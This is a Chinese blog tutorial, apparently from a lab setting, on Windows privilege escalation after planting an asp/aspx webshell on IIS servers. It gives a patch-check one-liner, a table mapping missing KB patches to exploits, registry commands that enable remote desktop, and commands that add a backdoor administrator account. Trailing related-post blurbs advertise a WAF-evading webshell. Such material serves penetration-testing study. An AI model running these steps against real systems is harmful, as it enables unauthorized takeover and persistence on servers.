hackmap-[windows权限提升(windows提权思路)]

最新推荐文章于 2024-04-23 17:28:48 发布
最新推荐文章于 2024-04-23 17:28:48 发布
阅读量4.8k 收藏 4
点赞数 2
文章标签: 系统安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_43405474/article/details/124057517
版权

hackmap-[windows权限提升{windows提权思路}]

1.前言

1.1.提权分类

水平权限提升(越权)

A,B同级用户越权

垂直权限提升

普通用户获得了管理员的权限 
Web 用户直接提权成管理员用户

1.2 windows提权概述

Exp 提权
数据库 SQLServer、MYSQL UDF 提权
第三⽅软件提权。

2.windows基于WebShell提权

2.1 前言

基于webshell提权的前提是,通过文件上传等漏洞获得webshell。

2.1.1 asp大马 vs aspx大马(windows2003+IIS)

1)asp大马

(1)上传asp大马 style.asp 密码1314
在这里插入图片描述
(2)执行命令whoami,提示拒绝访问。
在这里插入图片描述

2)aspx大马

(1)上传aspx大马
在这里插入图片描述
(2)执行一般命令时不会像asp木马一样,拒绝访问。
在这里插入图片描述

3)小结

IIS尽量用aspx 大马,因为asp 大马脚本权限可能会比较低 ,可以尝试上传aspx 的大马。

2.1.2 基于系统漏洞提权

思路:找补丁——>找漏洞——>找EXP
以windows2003 IIS提权为例。

1)信息收集

这一步信息收集的目的是测试目标系统安装了哪些补丁。
2003

systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\a.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt

大于2003

systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\a.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
2)漏洞补丁对照表

KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB944653 MS07-067
KB952004 MS09-012 PR
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011
kb942831 MS08-005
KB2503665 MS11-046
KB2592799 MS11-080
KB956572 MS09-012 烤肉
KB2621440 MS12-020
KB977165 MS10-015 Ms Viru
KB4013081 MS17-017
KB3139914 MS16-032
KB3124280 MS16-016
KB3134228 MS16-014
KB3079904 MS15-097
KB3077657 MS15-077
KB3045171 MS15-051
KB3000061 MS14-058
KB2829361 MS13-046
KB2850851 MS13-053 EPATHOBJ 0day 限32位
KB2707511 MS12-042 sysret -pid
KB2124261 KB2271195 MS10-065 IIS7
KB3198234 MS16-135
KB970483 MS09-020 IIS6
KB3031432 MS15-015

MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)

MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)

MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)

MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)

MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)

MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)

MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)

MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)

MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)

MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)

MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)

MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)

MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)

MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)

MS14-070  [KB2989935]  [Kernel Driver]  (2003)

MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)

MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)

MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)

MS14-002  [KB2914368]  [NDProxy]  (2003/XP)

MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)

MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)

MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)

MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)

MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)

MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)

MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)

MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)

MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)

MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)

MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)

MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)

MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)

MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)

MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)

MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)

MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)

MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)

MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)

MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)

MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)

MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)

MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

3)提权过程

1.执行cmd命令
2.上传提权exp
需要目录写权限? 哪些目录有写权限?
【日志、缓存、回收站、大马所在目录(尝试过,失败了)】 exe
3.在命令行下开启3389 端口
2003

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

03|08 通用(--3389.bat)

echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg

4.创建用户
net user hack 123.com /add net localgroup administrators hack /add
5.远程连接

3.实战

3.1针对2003 KB952004 提权实验

step1:利用aspx大马进行信息搜集——补丁安装情况

在这里插入图片描述

step2:针对上述漏洞上传提权工具

在这里插入图片描述

step3:提权

在这里插入图片描述

3.2 针对2008 IIS提权实验

建立站点

上传aspx大马和asp大马(做对比)

⚠️:IIS6.0比较特殊,asp大马不能执行命令。
asp大马 style.asp 1314
在这里插入图片描述
aspx 大马 jmdx.aspx d7sDs,/2sDSMEKX
在这里插入图片描述

step1:信息搜集——补丁信息

systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @type C:\Windows\Temp\a.txt|@find /i “%i”|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
在这里插入图片描述
目标:KB3045171
KB3045171 MS15-051

KB3031432 MS15-015 【】
没有找到合适的EXP。

添加KB到信息搜集的代码中,KB956572 KB952004
在这里插入图片描述
2003用过 KB952004
这次用KB956572

step2:上传EXP提权

⚠️:不同的大马权限是不同的,多尝试一些目录。
C:\windows\temp
在这里插入图片描述
上传成功。KB956572 对应的EXP提权。
提权:
在这里插入图片描述
KB956572 不好用。
在这里插入图片描述
KB 952004 提权也不好用。

MS15-051试试:
在这里插入图片描述

不行。
用x64的试试。
在这里插入图片描述
在这里插入图片描述成功提权。

step3:命令行下开启3389端口

上传3389.bat 文件

echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg

执行
在这里插入图片描述
查看是否开启成功:
在这里插入图片描述

step4:创建windows用户

net user sxk 123.com /add
net localgroup administrators sxk /add
在这里插入图片描述
在这里插入图片描述

step5:远程桌面连接

在这里插入图片描述
成功拿捏目标系统。

沧海一粟日尽其用
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
aspx大马
09-14
aspdama
webshell大马asp,jsp,php)
weixin_56537388的博客
08-29 1015
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp大马的效果:上传asp大马,将大马放到IIS服务器的根目录。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大马AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
windows系统权限提升
最新发布
weixin_53639243的博客
04-23 1243
提权方法。
内网渗透思路06之一次完整的渗透测试
划水的小白白
05-19 1515
高质量的多网段的渗透测试完整实例,对三层网段的目标进行检测。 从信息收集->漏洞测试->源代码审计->工具编写->逆向密文->服务器提权->隧道应用->目标获取, 使用工具包括单不限于, masscan、nmap、wfuzz、中国蚁剑、ILSpy、burpsuite、 gobuster、vs2012、metasploit、sockscap、proxychains3.
Asp大马介绍
Jim的博客
09-15 4545
最近草泥马这款最新版的Asp大马很热门,主流大马提权功能,信息收集功能,以及木马隐藏功能都十分不错。 "星外主机提权"、“华众主机提权”、“N点主机提权”、“新网主机提权
ASP大马网站渗透测试
01-15
一、 整体介绍     本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工具。  程序结合海洋顶端asp木马、老兵asp木马、Drakblade暗黑之剑1.3版本、05年到13年主流asp木马的优点进行开发完善制作。  程序在目录检测功能、隐藏功能、数据库操作和提权处做了较大改进,具体请看下列介绍 二、 提交代码经过ascii 2次转码post提交过IIS安全狗,护卫神,D盾,safe3 Waf等IIS防火墙拦截代码。 三、 登陆成功后显示"欢迎界面","欢迎界面"显示服务器安全指数,等级分为 高、中、低三等级,根据wscript.shell磁盘根目录是否可读取等功能判断。  第一项显示:服务器iis版本、服务器超时时间、以及session信息、服务器CPU数量、主机名、默认管理员信息、Terminal Service终端端口(需要wscript.shell组件支持)支持脚本探测(aspx,php,pl)功能,支持bing查询同服务器所有支持aspx脚本站点。 第二项显示:系统当前路径变量。   第三项显示:磁盘根目录的读取权限问题(判断是否可跨站)。 第四项显示:常用组件信息,左侧11个为危险组件,右侧11个为安全组件。   第五项显示:读取c:\windows\system32\sethc.exe 和 c:\windows\system32\magnify.exe 文件的属性、时间、文件体积,从而判断是否被入侵。 四、 右上角的ZONE-H图标为一键提交被黑网页到被黑站点统计www.zone-h.com.cn,个人信息请编辑程序修改,或用生成器生成。 五、 WEB根目录和本程序目录都可以转入文件操作页。  文件操作一:左侧为磁盘和快捷不安全目录查看(目录为智能判断,不存在则不显示)  文件操作二:右侧为文件操作模块和文件夹操作模块。 文件操作支持浏览器模式打开、编辑(支持UTF-8模式编辑)、复制、移动、删除(支持强制删除只读属性文件)、修改属性为隐藏or正常、数据库模式编辑。 文件夹操作支持修改文件夹属性、删除、复制、移动 数据库模式编辑支持查看内容、修改内容、删除内容、拖库。 六、 功能一分为三项功能 目录检测功能,补丁检测功能以及端口扫描功能。这三项功能不需要服务器过多脚本支持,故而放到一起。 ***目录扫描: 支持单文件检测,目录检测,是否循环所有磁盘,是否选择深度目录扫描和子目录扫描(目录扫描结尾必须加入“\”)
D2hackmap源码1.13c-v1.5
02-28
【D2hackmap源码1.13c-v1.5】是一款专为经典游戏《暗黑破坏神2》(Diablo II)设计的游戏辅助工具的源代码,主要用于地图修改和增强玩家的游戏体验。该源代码是Vigol版本,且已适配Visual Studio 2010进行编译,这...
d2hackmap
03-06
【标题】"d2hackmap" 是一个与游戏《暗黑破坏神2》(Diablo II)相关的工具,主要用于地图的修改和探索。这个工具的名字可能是由“Diablo 2”和“hack map”组合而成,暗示了它可以帮助玩家更好地理解和定制游戏中的...
hackmap:帮助在hacknights进行协作的应用程序
02-04
hackmap是开发的一种可视化工具,可帮助成员彼此找到彼此并在hack晚上的聚会活动中进行协作。 可以在查看其运行情况。 我们针对此应用程序的一些主要设计目标是: 使其易于操作且成本低廉。 hackmap在和一个小的...
D2hackmap1.13c源码
03-24
通过分析D2HackMap1.13c的源码,开发者可以提升自己在游戏编程、逆向工程、多线程编程等方面的技术能力,甚至可能为《暗黑破坏神2》社区贡献新的扩展或工具。 最后,值得注意的是,使用和分享这类源码需要遵循法律...
提权exp合集
收集盒 Book box
06-21 3296
一些本地提权漏洞,对应的补丁序列号,提权的时候会用到,先看看打没打补丁,再决定用哪个。 KB2360937 MS10-084 KB2478960 MS11-014 KB2507938 MS11-056 KB2566454 MS11-062 KB2646524 MS12-003 KB2645640 MS12-009 KB2641653 MS12-018 KB944653 MS07-0
大马提权详细过程
热门推荐
18年3月萌新白帽子
06-25 1万+
1.首先利用菜刀连接我们上传的小马文件2.在网站的www根目录下上传我们准备好的的大马文件3.这里我们上传的大马名称是chao.asp4.之后打开浏览器访问我们刚刚登陆的大马文件地址,并输入密码clever5.登陆进去之后如果发现CMD功能无法使用那么我们就自己通过菜刀上传一个CMD,我将其命名为smallchao.exe6.点击大马页面左侧的执行CMD这一栏7.在shell路径这一栏里输入服务器...
php 大马 mysql提权,Mysql提权-基于Mysql的webshell提权
weixin_33661631的博客
03-22 796
基于Mysql的webshell提权【实验目的】通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。【实验环境】攻击机:Win2008-att用户名college,密码360College使用的webshell文件:dama.php目标靶机:Win2003-DVWA用户名college,密码360College【实验步骤...
拿到webshell后的提权详解
zdy8023的博客
04-09 9425
首先在提权之前,我们先得清楚什么是提权; 提权主要针对在网站测试过程中,当测试某一个网站是,通过各种漏洞提升webshell权限已夺得改服务器权限。 那么网站拿到webshell各脚本文件对应的权限分别是什么呢? asp/php 服务器的匿名访问权限 aspx user 权限 jsp 通常是系统权限 了解这些之后,接下来的事情就是收集信息 1.服务器内网与外网信息 2.服务器系统...
webshell提权拿服务器方法总结
xysoul的专栏
03-20 1万+
今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell的提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是否能执行CMD命令,如果可以执行CMD的话我相信能给提权拿服务器省去很多时间。 如果不能执行CMD命令的话大家继续往下看。 2.不能执行CMD的话我们可以看下组件支持,脚本
WebShell-大马实战
yuan_boss的博客
08-29 1598
webshell-大马下载地址:https://gitee.com/yuan_boss/labs.git。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些。里面有些大马的连接密码可以修改,如果不知道密码,可以自行查看源码。使用资料中的大马AspxSpy2014Final.aspx。登录之后,就可以看到功能界面了,这里演示cmd操作。上传asp大马,将大马放到IIS服务器的根目录。以下是jshell.jsp的大马。里面有许多功能,可以研究研究。
经典的 Aspx一句话木马使用
tuo9999的专栏
07-12 1674
1. 相当于 ASP 一句话木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值